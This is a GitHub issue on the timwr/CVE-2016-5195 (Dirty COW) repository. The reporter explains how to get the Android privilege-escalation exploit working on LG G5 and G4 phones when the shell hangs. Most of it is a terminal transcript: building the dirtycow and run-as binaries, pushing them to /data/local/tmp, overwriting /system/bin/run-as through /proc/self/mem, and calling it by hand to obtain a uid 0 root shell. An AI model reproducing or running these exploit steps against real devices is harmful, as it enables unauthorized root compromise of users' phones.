Exploits hangs, no SELinux errors

Sup!

I was testing the exploit with a LG G5 and a G4 and the shell was hanging but I wasn't getting any SELinux errors with adb logcat | grep avc so I was trying some things and found out that if you change the Makefile from

adb shell /system/bin/run-as

adb shell

and call manually /system/bin/run-as, you get root.

demo:

~/S/CVE-2016-5195> make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23
make[1]: Entering directory '/home/svieg/Shared/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
make[1]: Leaving directory '/home/svieg/Shared/CVE-2016-5195'
adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow
198 KB/s (10056 bytes in 0.049s)
adb push libs/arm64-v8a/run-as /data/local/tmp/run-as
220 KB/s (10056 bytes in 0.044s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (10056) and destination file size (14192) differ

[*] size 10056
[*] mmap 0x7fa684e000
[*] currently 0x7fa684e000=10102464c457f
[*] madvise = 0x7fa684e000 10056
[*] madvise = 0 31
[*] /proc/self/mem 30168 3
[*] exploited 0x7fa684e000=10102464c457f
adb shell
shell@h1:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
shell@h1:/ $ /system/bin/run                                                   
run-as runcon 
shell@h1:/ $ /system/bin/run-as                                                
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@h1:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0

timwr / CVE-2016-5195

Exploits hangs, no SELinux errors #47